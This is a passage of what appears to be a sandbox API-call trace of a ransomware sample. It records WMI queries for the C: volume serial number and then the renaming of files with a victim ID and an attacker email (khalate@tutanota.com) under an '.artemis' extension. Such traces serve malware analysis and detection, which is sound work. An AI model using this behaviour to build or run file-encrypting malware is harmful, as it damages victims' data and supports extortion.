WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x69ded6c | out: puCount=0x69ded6c*=0x0) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x69ded58 | out: puCount=0x69ded58*=0x2) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0x0, pszText=0x0 | out: puBuffLength=0x69ded54*=0xf, pszText=0x0) returned 0x0 [0198.752] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded54*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.752] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded08 | out: ppv=0x69ded08*=0x72015c) returned 0x0 [0198.752] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded00 | out: pAptType=0x69ded00*=1) returned 0x0 [0198.752] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded04 | out: ppvObject=0x69ded04*=0x0) returned 0x80004002 [0198.752] IUnknown:Release (This=0x72015c) returned 0x1 [0198.753] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de670 | out: ppv=0x69de670*=0x6736db8) returned 0x0 [0198.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736db8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de888 | out: ppvObject=0x69de888*=0x0) returned 0x80004002 [0198.753] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736db8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de89c | out: ppvObject=0x69de89c*=0x6738a80) returned 0x0 [0198.753] WbemDefPath:IUnknown:Release (This=0x6736db8) returned 0x0 [0198.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4bc | out: ppvObject=0x69de4bc*=0x6738a80) returned 0x0 [0198.753] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de478 | out: ppvObject=0x69de478*=0x0) returned 0x80004002 [0198.754] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0198.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dddd4 | out: ppvObject=0x69dddd4*=0x0) returned 0x80004002 [0198.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddd84 | out: ppvObject=0x69ddd84*=0x0) returned 0x80004002 [0198.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddd90 | out: ppvObject=0x69ddd90*=0x77c108) returned 0x0 [0198.754] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c108, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddd98 | out: pCid=0x69ddd98*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.754] WbemDefPath:IUnknown:Release (This=0x77c108) returned 0x3 [0198.754] CoGetContextToken (in: pToken=0x69dddf0 | out: pToken=0x69dddf0) returned 0x0 [0198.754] CoGetContextToken (in: pToken=0x69de1f8 | out: pToken=0x69de1f8) returned 0x0 [0198.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de288 | out: ppvObject=0x69de288*=0x0) returned 0x80004002 [0198.754] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0198.754] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x1 [0198.754] CoGetContextToken (in: pToken=0x69deb80 | out: pToken=0x69deb80) returned 0x0 [0198.754] CoGetContextToken (in: pToken=0x69deae0 | out: pToken=0x69deae0) returned 0x0 [0198.754] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x69debb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69debac | out: ppvObject=0x69debac*=0x6738a80) returned 0x0 [0198.754] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0198.754] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0198.754] WbemDefPath:IWbemPath:SetText (This=0x6738a80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0198.754] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x69ded30 | out: puCount=0x69ded30*=0x2) returned 0x0 [0198.754] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x69ded2c*=0x0, pszText=0x0 | out: puBuffLength=0x69ded2c*=0xf, pszText=0x0) returned 0x0 [0198.754] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x69ded2c*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded2c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.754] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded30 | out: ppv=0x69ded30*=0x72015c) returned 0x0 [0198.754] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded28 | out: pAptType=0x69ded28*=1) returned 0x0 [0198.754] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded2c | out: ppvObject=0x69ded2c*=0x0) returned 0x80004002 [0198.754] IUnknown:Release (This=0x72015c) returned 0x1 [0198.755] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de950 | out: ppv=0x69de950*=0x672f460) returned 0x0 [0198.755] WbemLocator:IUnknown:QueryInterface (in: This=0x672f460, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69deb68 | out: ppvObject=0x69deb68*=0x0) returned 0x80004002 [0198.755] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f460, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb7c | out: ppvObject=0x69deb7c*=0x67370a8) returned 0x0 [0198.755] WbemLocator:IUnknown:Release (This=0x672f460) returned 0x0 [0198.755] WbemLocator:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de79c | out: ppvObject=0x69de79c*=0x67370a8) returned 0x0 [0198.755] WbemLocator:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de758 | out: ppvObject=0x69de758*=0x0) returned 0x80004002 [0198.756] WbemLocator:IUnknown:AddRef (This=0x67370a8) returned 0x3 [0198.756] WbemLocator:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de0b4 | out: ppvObject=0x69de0b4*=0x0) returned 0x80004002 [0198.756] WbemLocator:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69de064 | out: ppvObject=0x69de064*=0x0) returned 0x80004002 [0198.756] WbemLocator:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de070 | out: ppvObject=0x69de070*=0x0) returned 0x80004002 [0198.756] CoGetContextToken (in: pToken=0x69de0d0 | out: pToken=0x69de0d0) returned 0x0 [0198.846] CoGetContextToken (in: pToken=0x69de4d8 | out: pToken=0x69de4d8) returned 0x0 [0198.846] WbemLocator:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de568 | out: ppvObject=0x69de568*=0x0) returned 0x80004002 [0198.846] WbemLocator:IUnknown:Release (This=0x67370a8) returned 0x2 [0198.846] WbemLocator:IUnknown:Release (This=0x67370a8) returned 0x1 [0198.846] CoGetContextToken (in: pToken=0x69deb48 | out: pToken=0x69deb48) returned 0x0 [0198.846] CoGetContextToken (in: pToken=0x69deaa8 | out: pToken=0x69deaa8) returned 0x0 [0198.846] WbemLocator:IUnknown:QueryInterface (in: This=0x67370a8, riid=0x69deb78*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x69deb74 | out: ppvObject=0x69deb74*=0x67370a8) returned 0x0 [0198.846] WbemLocator:IUnknown:AddRef (This=0x67370a8) returned 0x3 [0198.846] WbemLocator:IUnknown:Release (This=0x67370a8) returned 0x2 [0198.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x69ded0c | out: puCount=0x69ded0c*=0x2) returned 0x0 [0198.847] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x69ded08*=0x0, pszText=0x0 | out: puBuffLength=0x69ded08*=0xf, pszText=0x0) returned 0x0 [0198.847] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x69ded08*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded08*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.847] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x69debe4 | out: ppv=0x69debe4*=0x6736ef8) returned 0x0 [0198.847] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736ef8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x69dec78 | out: ppNamespace=0x69dec78*=0x6748264) returned 0x0 [0201.280] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb14 | out: ppvObject=0x69deb14*=0x781db4) returned 0x0 [0201.280] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781db4, pProxy=0x6748264, pAuthnSvc=0x69deb64, pAuthzSvc=0x69deb60, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c, pImpLevel=0x69deb4c, pAuthInfo=0x69deb50, pCapabilites=0x69deb54 | out: pAuthnSvc=0x69deb64*=0xa, pAuthzSvc=0x69deb60*=0x0, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c*=0x6, pImpLevel=0x69deb4c*=0x2, pAuthInfo=0x69deb50, pCapabilites=0x69deb54*=0x1) returned 0x0 [0201.280] WbemLocator:IUnknown:Release (This=0x781db4) returned 0x1 [0201.280] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb08 | out: ppvObject=0x69deb08*=0x781dd4) returned 0x0 [0201.280] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb04 | out: ppvObject=0x69deb04*=0x781db4) returned 0x0 [0201.280] WbemLocator:IClientSecurity:SetBlanket (This=0x781db4, pProxy=0x6748264, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0201.281] WbemLocator:IUnknown:Release (This=0x781db4) returned 0x2 [0201.281] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x1 [0201.281] CoTaskMemFree (pv=0x77dde8) [0201.281] WbemLocator:IUnknown:Release (This=0x6736ef8) returned 0x0 [0201.281] WbemLocator:IUnknown:QueryInterface (in: This=0x6748264, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de704 | out: ppvObject=0x69de704*=0x781dd4) returned 0x0 [0201.281] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de6c0 | out: ppvObject=0x69de6c0*=0x0) returned 0x80004002 [0201.285] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de4dc | out: ppvObject=0x69de4dc*=0x0) returned 0x80004002 [0201.287] WbemLocator:IUnknown:AddRef (This=0x781dd4) returned 0x3 [0201.287] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de01c | out: ppvObject=0x69de01c*=0x0) returned 0x80004002 [0201.289] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddfcc | out: ppvObject=0x69ddfcc*=0x0) returned 0x80004002 [0201.292] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddfd8 | out: ppvObject=0x69ddfd8*=0x781d34) returned 0x0 [0201.292] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781d34, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddfe0 | out: pCid=0x69ddfe0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0201.292] WbemLocator:IUnknown:Release (This=0x781d34) returned 0x3 [0201.292] CoGetContextToken (in: pToken=0x69de038 | out: pToken=0x69de038) returned 0x0 [0201.292] CoGetContextToken (in: pToken=0x69de440 | out: pToken=0x69de440) returned 0x0 [0201.292] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4d0 | out: ppvObject=0x69de4d0*=0x781dbc) returned 0x0 [0201.292] WbemLocator:IRpcOptions:Query (in: This=0x781dbc, pPrx=0x781dd4, dwProperty=2, pdwValue=0x69de4f8 | out: pdwValue=0x69de4f8) returned 0x80004002 [0201.292] WbemLocator:IUnknown:Release (This=0x781dbc) returned 0x3 [0201.292] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x2 [0201.292] CoGetContextToken (in: pToken=0x69dea18 | out: pToken=0x69dea18) returned 0x0 [0201.293] CoGetContextToken (in: pToken=0x69de978 | out: pToken=0x69de978) returned 0x0 [0201.293] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x69dea48*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x69dea44 | out: ppvObject=0x69dea44*=0x6748264) returned 0x0 [0201.293] WbemLocator:IUnknown:AddRef (This=0x6748264) returned 0x4 [0201.293] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x3 [0201.293] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x2 [0201.293] SysStringLen (param_1=0x0) returned 0x0 [0201.293] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x69deddc | out: puCount=0x69deddc*=0x0) returned 0x0 [0201.293] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x69dedd8*=0x0, pszText=0x0 | out: puBuffLength=0x69dedd8*=0x20, pszText=0x0) returned 0x0 [0201.293] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x69dedd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dedd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.293] CoGetContextToken (in: pToken=0x69dea48 | out: pToken=0x69dea48) returned 0x0 [0201.293] WbemLocator:IUnknown:AddRef (This=0x781dd4) returned 0x3 [0201.293] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de8dc | out: ppvObject=0x69de8dc*=0x781dd4) returned 0x0 [0201.293] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x3 [0201.293] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x2 [0201.293] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x69dede0*=0x0, pszText=0x0 | out: puBuffLength=0x69dede0*=0x20, pszText=0x0) returned 0x0 [0201.293] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x69dede0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0201.294] IWbemServices:GetObject (in: This=0x6748264, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x69ded94*=0x0, ppCallResult=0x0 | out: ppObject=0x69ded94*=0x673bac8, ppCallResult=0x0) returned 0x0 [0202.060] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x69ded94 | out: puCount=0x69ded94*=0x2) returned 0x0 [0202.060] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x69ded90*=0x0, pszText=0x0 | out: puBuffLength=0x69ded90*=0xf, pszText=0x0) returned 0x0 [0202.060] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x69ded90*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded90*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.060] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3533a1c*=0, plFlavor=0x3533a20*=0 | out: pVal=0x69ded90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3533a1c*=8, plFlavor=0x3533a20*=0) returned 0x0 [0202.060] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.060] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.060] IWbemClassObject:Get (in: This=0x673bac8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x69ded98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3533a1c*=8, plFlavor=0x3533a20*=0 | out: pVal=0x69ded98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3533a1c*=8, plFlavor=0x3533a20*=0) returned 0x0 [0202.060] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.060] SysStringByteLen (bstr="9C354B42") returned 0x10 [0202.060] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0202.061] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x69de998, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x73 [0202.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69dedf8) returned 1 [0202.061] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x69dee74 | out: lpFileInformation=0x69dee74*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1e061780, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0xb10)) returned 1 [0202.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69dedf4) returned 1 [0202.061] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0202.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69def7c) returned 1 [0202.062] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x69dea84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0202.062] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x69dea58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", 